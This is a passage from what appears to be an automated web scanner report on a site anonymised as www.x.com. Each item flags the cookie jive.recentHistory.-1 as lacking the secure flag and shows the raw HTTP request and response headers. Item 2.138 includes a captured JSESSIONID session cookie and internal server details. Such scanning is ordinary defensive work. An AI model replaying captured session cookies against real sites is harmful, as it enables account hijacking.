Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337343b3130322c333235313b3130322c333432363b3130322c333337353b3130322c333433313b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333434343b3130322c333536313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:56 GMT; Path=/
Vary: User-Agent
JP: D=102916 t=1313157236205992
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.127. https://www.x.com/docs/DOC-3375

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3375

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3375 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337353b3130322c333432373b3130322c333434333b3130322c333433313b3130322c333432363b3130322c333439313b3130322c333434343b3130322c333536313b3130322c333536323b3130322c333631393b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:54 GMT; Path=/
Vary: User-Agent
JP: D=172605 t=1313157234881833
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.128. https://www.x.com/docs/DOC-3426

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3426

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3426 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333432363b3130322c333434343b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333432373b3130322c333536323b3130322c333631393b3130322c333638383b3130322c333831323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:53 GMT; Path=/
Vary: User-Agent
JP: D=177923 t=1313157233753621
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.129. https://www.x.com/docs/DOC-3427

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3427

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3427 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333434343b3130322c333536323b3130322c333631393b3130322c333638383b3130322c333831323b3130322c333834313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:53 GMT; Path=/
Vary: User-Agent
JP: D=115565 t=1313157233228654
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.130. https://www.x.com/docs/DOC-3431

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3431

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3431 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333433313b3130322c333434343b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333536323b3130322c333631393b3130322c333638383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:54 GMT; Path=/
Vary: User-Agent
JP: D=173915 t=1313157234152384
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.131. https://www.x.com/docs/DOC-3443

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3443

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3443 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333434333b3130322c333631393b3130322c333638383b3130322c333439313b3130322c333536313b3130322c333434343b3130322c333536323b3130322c333831323b3130322c333834313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:52 GMT; Path=/
Vary: User-Agent
JP: D=98914 t=1313157232773548
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.132. https://www.x.com/docs/DOC-3444

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3444

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3444 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333434343b3130322c333536313b3130322c333631393b3130322c333638383b3130322c333831323b3130322c333536323b3130322c333834313b3130322c313631333b3130322c313035313b3130322c313033313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:51 GMT; Path=/
Vary: User-Agent
JP: D=100315 t=1313157231659068
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.133. https://www.x.com/docs/DOC-3491

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3491

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3491 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333439313b3130322c333631393b3130322c333434343b3130322c333638383b3130322c333536313b3130322c333536323b3130322c333831323b3130322c333834313b3130322c313631333b3130322c313035313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:52 GMT; Path=/
Vary: User-Agent
JP: D=218057 t=1313157232304538
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.134. https://www.x.com/docs/DOC-3561

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3561

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3561 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333536313b3130322c333834313b3130322c333638383b3130322c333631393b3130322c333536323b3130322c313631333b3130322c333831323b3130322c313035313b3130322c313033313b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:51 GMT; Path=/
Vary: User-Agent
JP: D=135641 t=1313157231234077
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.135. https://www.x.com/docs/DOC-3562

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3562

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3562 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333536323b3130322c333638383b3130322c333834313b3130322c333831323b3130322c313033313b3130322c313035313b3130322c333631393b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:50 GMT; Path=/
Vary: User-Agent
JP: D=175892 t=1313157230683229
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.136. https://www.x.com/docs/DOC-3619

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3619

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3619 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333631393b3130322c313631333b3130322c333831323b3130322c333834313b3130322c313035313b3130322c313033313b3130322c333638383b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:50 GMT; Path=/
Vary: User-Agent
JP: D=123460 t=1313157230328400
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.137. https://www.x.com/docs/DOC-3688

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3688

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3688 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333638383b3130322c333831323b3130322c333834313b3130322c313631333b3130322c313033313b3130322c313035313b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=147682 t=1313157229798103
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.138. https://www.x.com/docs/DOC-3811

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3811

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3811 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/xspaces?view=documents
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b332c3133343430323b332c3133393730313b332c3132323335343b332c3134303635343b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b332c3133343430323b332c3133393730313b332c3132323335343b332c3134303635343b; Expires=Sun, 11-Sep-2011 13:39:54 GMT; Path=/
Vary: User-Agent
JP: D=104592 t=1313156394128506
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.139. https://www.x.com/docs/DOC-3812

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3812

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3812 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333831323b3130322c313033313b3130322c313631333b3130322c313035313b3130322c313337323b3130322c333834313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=97831 t=1313157229433265
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.140. https://www.x.com/docs/DOC-3836

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3836

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3836 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333833363b3130322c323234313b3130322c333230313b3130322c313535313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b3130322c333335323b3130322c333335333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:05 GMT; Path=/
Vary: User-Agent
JP: D=194903 t=1313157245590892
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.141. https://www.x.com/docs/DOC-3841

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3841

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3841 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333834313b3130322c333831323b3130322c313033313b3130322c313337323b3130322c313035313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=198718 t=1313157228930468
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.142. https://www.x.com/message/186684

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/186684

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/186684 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34363935333b312c35333838343b312c34393435343b312c35343036353b312c35333937373b312c34373636333b312c35343035383b312c35333135383b312c35333137323b312c35333235323b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:40 GMT; Path=/
Vary: User-Agent
JP: D=137098 t=1313157519959178
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.143. https://www.x.com/message/198017

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/198017

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/198017 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:39 GMT; Path=/
Vary: User-Agent
JP: D=113649 t=1313157519428788
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.144. https://www.x.com/message/211333

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211333

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/211333 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333135383b312c35333137323b312c35333235323b312c35333331393b312c35333331323b312c35333037353b312c35333334333b312c35333539323b312c35333437393b312c35333631303b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:36 GMT; Path=/
Vary: User-Agent
JP: D=58458 t=1313157516498640
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.145. https://www.x.com/message/211439

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211439

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/211439 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:36 GMT; Path=/
Vary: User-Agent
JP: D=102902 t=1313157516178631
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.146. https://www.x.com/message/211738

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211738

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/211738 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=105262 t=1313157515804148
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.147. https://www.x.com/message/212001

Summary

Severity:   Information
